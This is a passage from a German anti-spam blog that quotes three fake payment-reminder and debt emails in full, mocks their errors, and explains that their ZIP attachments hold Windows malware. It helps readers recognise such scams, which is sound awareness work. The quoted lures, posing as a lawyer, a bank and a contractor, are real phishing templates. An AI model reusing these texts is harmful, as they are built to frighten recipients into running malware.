¹Die ganzen Internet-Unternehmen könnten damit anfangen, ihre Mail digital zu signieren, um dieser Form der Kriminalität (und dem Phishing) nach und nach das Wasser abzugraben. Sie tun dies nicht. Die technische Lösung für die digitale Signatur von E-Mail steht seit 25 Jahren jedem zur Verfügung, der sie nutzen möchte. Sie tun dies trotzdem nicht. Die technische Lösung steht seit über anderthalb Jahrzehnten in freier und kostenlos nutzbarer Form jedem zur Verfügung, der sie nutzen möchte. Sie tun dies trotzdem nicht. Die ganzen Unternehmen, die sich angesichts der gegenwärtigen Kriminalität aus nicht nachvollziehbaren Gründen (ich nenne sie einfach mal in Ermangelung besserer Erklärungen Verantwortungslosigkeit und Arschlochhaftigkeit) weigern, ihre Kunden zu schützen, indem sie den Verfasser und unverfälschten Inhalt ihrer E-Mails überprüfbar sicherstellen, tragen eine erhebliche Mitschuld am Erfolg der gegenwärtigen Internet-Kriminalität, vom Phishing bis zum Erpressungstrojaner.

Danke an die diversen Einsender dieser wirklich gefährlichen Spam! Ein spezieller Dank geht an Hans.

Die automatische Lastschrift von Pay Online24 konnte nicht durchgeführt werden

Freitag, 22. Januar 2016

Sehr geehrte(r) $Vorname $Nachname,

Natürlich stand da der richtige Name des Empfängers. Wer nicht weiß, wie Spammer an die Namen zu Mailadressen kommen, lese hier weiter und grusele sich!

das von Ihnen gespeicherte Bankkonto [sic! Wir speichern ja alle Bankkonten] wurde nicht hinreichend gedeckt um die Lastschrift vorzunehmen. Unsere Erinnerung blieb bisher leider ohne Erfolg Heute bieten wir Ihnen damit letztmalig die Möglichkeit, den ausbleibenden Betrag unseren Mandanten Pay Online24 GmbH zu überweisen. Aufgrund des bestehenden Zahlungsrückstands sind Sie verpflichtet zusätzlich [sic!], die durch unsere Beauftragung entstandenen Kosten von 52,48 Euro zu bezahlen [sic!]. Die Höhe des Betrags kann aufgrund berechneter Zinsen abweichen [sic!].

Ganz schlimme Mahnung. So schlimm, dass nicht einmal der zu zahlende Betrag drinsteht. Aber allein die Mahngebühr… und Zinsen kommen auch noch drauf… auf einen völlig unbekannten Betrag, der wohl höher als die Gebühr sein wird.

Und nicht nur den Betrag hat der Absender vergessen, sondern auch:

  1. Die Kontonummer des Bankkontos und das Kreditinstitut für den Lastschrifteinzug (viele Menschen und insbesondere Unternehmen haben mehrere Konten).
  2. Der Zeitpunkt, zu dem die Lastschrift angeblich versucht wurde, damit das mal mit dem Kontoauszug verglichen werden kann.
  3. Der eigentliche Rechnungsgegenstand, auf den sich die Forderung bezieht. Der vorliegende Text sagt einfach nur: Zahlen sie grundlos Geld, viel Geld!

Mit solchen Angaben würde ja auch sofort klar, dass es sich nicht um eine Mahnung handelt, sondern um kriminelle Spam – außer, den Verbrechern gelänge es, auch noch die richtige Kontonummer zu erraten.

Namens und in Vollmacht unseren Mandanten Pay Online24 GmbH ordnen wir Ihnen an, die offene Gesamtforderung unverzüglich zu decken [sic!]. Bei Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb von 24 Stunden [sic!].

Na, dann deckt mal schön! Aber nicht dabei lachen! Die Angabe einer Telefonnummer oder einer Anschrift für die erwartete Kontaktaufnahme hat der angebliche Anwalt, der nur in der kranken Phantasie eines Spammerhirns existiert, leider vergessen. Dafür hat er…

Eine vollständige Forderungsausstellung, der Sie alle Buchungen entnehmen können, befindet sich im Anhang. Die Überweisung erwarten wir bis spätestens 26.01.2016.

…einen Anhang angehängt, den man öffnen soll, wenn man rausbekommen möchte, um was es hier überhaupt geht.

Nun, ich verrate hier kein Geheimnis. Es handelt sich um eine Spam. Das kann man allein daran erkennen, dass im Text der Mail eigentlich nichts steht (dies aber sehr aufregend und verängstigend formuliert), wohl, weil das Mailpapier bereits vollgeschrieben war – und alle Informationen erst im Anhang versprochen werden. Ein krimineller Spammer, der seine Empfänger dazu bringen will, einen Anhang zu öffnen, hat genau eine Absicht: Er will ihnen Schadsoftware installieren.

Der Anhang ist ein ZIP-Archiv, in dem ein ZIP-Archiv liegt, in dem wiederum eine Datei mit der Dateinamenserweiterung .COM liegt. Dies ist eine von Spammern zugestellte ausführbare Datei für Microsoft Windows, und wer darauf doppelklickt, startet ein Programm von Verbrechern und hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen – und zwar von Leuten, die besser mit Handschellen bedient wären.

Wer sich auf sein Antivirus-Schlangenöl verlässt, ist bei dieser recht aktuellen Schadsoftware in vielen Fällen verlassen. Deshalb ist es wichtig, derartige Spam selbst zu erkennen und niemals darin herumzuklicken, sondern sie zu löschen. Generell sollte niemals ein Anhang in einer E-Mail geöffnet werden, der vorher nicht abgesprochen wurde.

Mit verbindlichen Grüßen

Rechtsanwalt Mattis Richter

Übrigens: Richtige Anwälte schreiben (aus Gründen der Rechtssicherheit) Briefe, und senden diese oft freundlicherweise vorab per Mail zu. Ich habe noch nie eine Mail von einem Rechtsanwalt bekommen, in der nicht eine Telefonnummer für schnelle Rückfragen stand – zusammen mit der Anschrift der Kanzlei.

Was hier grüßt, ist ein Verbrecher.

Diese Spam ist ein Zustecksel meines Lesers E.T.

Kreditschuld zur Rechnung #239574485901756

Dienstag, 29. April 2014

Die Schadsoftware-Spammer haben gerade so viele neue Texte, hier gleich noch einer:

Sehr geehrter Kunde,

Wo ich doch überall Kunde bin, ohne dass ich einen Namen habe, zum Beispiel…

Wir sind ganz dankbar, dass Sie die Dienstleistungen unserer Bank benutzt haben.

…bei einer Bank, die zum Ausgleich dafür aber auch keine Firmierung hat.

Wir teilen Ihnen mit, dass vom 28.04.2014 die Schuld beim Konto #239574485901756 3892.99 Euro beträgt. Wir bieten Ihnen an, die Rückzahlung der Geldmittel in vollem Umfang bis 24.05.2014 freiwillig durchzuführen [sic! Zahl deine Schulden freiwillig!].

Die freiwillige Rückzahlung der Geldmittel zum Vertrag #F3131E4955124464A [sic!] bietet Ihnen an:
1) Ihre positive Kredit-Geschichte beibehalten [sic!]
2) Die Gerichtsverhandlung vermeiden [sic!]

Keine Bank, die deutschsprachig mailt, schreibt ein ‚#‘ vor einer Kontonummer. Und ein „Vertrag“, über den man nichts weiter erfährt als eine sechszehnstellige sedezimale Zahl, ist einfach nur lächerlich. Damit passt dieser „Vertrag“ aber ganz hervorragend in die gesamte Lächerlichkeit des Textes, der mit erstaunlich vielen Worten genau nichts sagt.

Im Falle der Nichtzahlung 3892.99 Euro [sic! Wort fehlt.] sind wir im Rahmen der aktuellen Gesetzgebung berechtigt [sic! Das Bürgerliche Gesetzbuch vom 1. Januar 1900 ist ja so was von aktuell…], die Gerichtsstrafe [sic! Tolles Wort!] wegen der Schuldigkeit auszuführen [sic!].

Überdem weiß diese „Bank“ offenbar nicht, wie das gerichtliche Mahnverfahren in der Bundesrepublik abläuft, sonst würde sie wohl kaum so eine unbeholfene und unfreiwillig komische… sorry… Scheiße schreiben.

Die Vertragskopie #F3131E4955124464A und Zahlungsangaben sind zu diesem Brief als ZIP-Datei „vertrag_F3131E4955124464A.zip“ hinzugefügt.

Klar, wie immer ist es ein ZIP-Archiv, das an der Spam hängt. Wer häufiger in Unser täglich Spam reinschaut, weiß schon, was jetzt kommt: Darin ist eine einzige Datei, deren Dateiname auf .exe endet, es handelt sich um eine ausführbare Datei für Microsoft Windows, die von einem kriminellen Spammer mit einer alarmierend formulierten Spam zugestellt wurde. Wer diese Datei auf seinem Rechner ausgeführt hat, der hat ein Problem: Der Rechner auf dem Schreibtisch gehört jemandem anders, die Internetleitung gehört jemandem anders und die auf dem Rechner gespeicherten Daten gehören ebenfalls jemandem anders.

Die sehr aktuelle Schadsoftware wird zurzeit von weniger als zehn Prozent der gängigen Antivirus-Programme erkannt. Und genau so etwas ist der Grund, weshalb man Spam selbst erkennen und löschen muss, anstatt verängstigt oder neugierig – dies sind zwei Haltungen, denen die Dummheit auf dem Fuße folgt – darin herumzuklicken. Wenn aber das beste Antivirus- und Antispam-Program der Welt, das Gehirn, erst einmal aktiviert wurde, werden oft – neben einigen unterstützenden Addons für Webbrowser und Mailclient – keine zusätzlichen Sicherheitsprogramme mehr benötigt.

Mit freundlichen Grüßen,
Leiter des Departments für die Arbeit mit den Schulden. [sic!]
Abbes Eggert
+49 (0) 30 649 574 xx [Hier unkenntlich gemacht]

Bwahahaha! Einen schönen Gruß zurück an den „Leiter des Departments für die Arbeit mit den Schulden“! Spammer, du hast mich zum Lachen gebracht, und das ist bei deinen miesen, asozialen Nummern wirklich nicht so einfach. Aber so eine dümmliche Selbstbezeichnung eines Spammers ist mir schon lange nicht mehr untergekommen.

überfällige Zahlung

Mittwoch, 16. April 2014

Alle laufenden Arbeiten wurden rechtzeitig durchgeführt, ich verstehe nicht warum Sie immer noch nicht bezahlt haben und mir 156.72 euro schulden. Kostenplan im Anhang.

Gudeheuic Dogan.

Hallo, Empfänger, den ich nicht kenne,

du hast keinen Namen, und deshalb kann ich dich nicht ansprechen. Ich habe irgendwelche Arbeiten für dich gemacht und dich dabei nicht nach deinem Namen gefragt. Die Arbeiten sind fertig. Du hast die noch nicht bezahlt und schuldest mir Geld. Wenn du wissen willst, um was es überhaupt geht, musst du den Anhang aufmachen.

Ein Name, den du noch nie gehört hast.

Die Rätselfrage, was sich wohl in diesem Anhang – ein ZIP-Archiv mit dem Dateinamen kostenplan.zip – befinden könnte, ist natürlich zu einfach. Und ganz so, wie es fast jeder vermuten würde: Es handelt sich tatsächlich um eine .exe, um eine ausführbare Datei für Microsoft Windows. Diese wurde von kriminellen Spammern zugestellt, und das macht wohl auch klar, was man seinem Computer und sich selbst antut, wenn man dieses von Kriminellen zugestellte Programm startet. Deshalb löscht man ja auch solche anonyme Spam, die im Text der Mail zwar aufwühlend klingt, aber nichts sagt, um zu proklamieren, dass alles Weitere im Anhang zu lesen ist, der ein ZIP-Archiv ist.

Die Erkennung dieses Musters ist also wirklich leicht. Generell gilt: Jede „geschäftliche“ Mail mit einem ZIP-Archiv im Anhang stinkt und sollte sofort Spamverdacht erwecken, auch bei namentlicher Ansprache¹. Es gibt keinen objektiven Grund, so zu mailen². PDF-Dokumente können ihrerseits komprimiert sein. Der einzige Grund ist das Austricksen der Spamfilter.

Für das Antivirus-Schlangenöl ist die Erkennung hingegen nicht so leicht, die angehängte Schadsoftware wird nur von zwei Fünftel der gängigen Programme als Schadsoftware erkannt. Es gibt eben keine Alternative zur Benutzung des Gehirns, und es gibt keine Software, mit der man sich diese „Mühe“ ersparen kann. Zum Glück, möchte ich am liebsten sagen… ;)

¹Nach diversen Datenlecks haben Spammer inzwischen umfangreiche Zuordnungen von Mailadressen zu Namen zur Verfügung, so dass sie oft eine richtige Anrede hinbekommen.

²Übrigens auch nicht für die Deutsche Telekom, die in dieser Form Rechnungen zustellt und damit den Boden für diese Kriminalität bereitet. PDF-Dokumente sind auch digital signierbar, werte Verantwortliche bei der Telekom.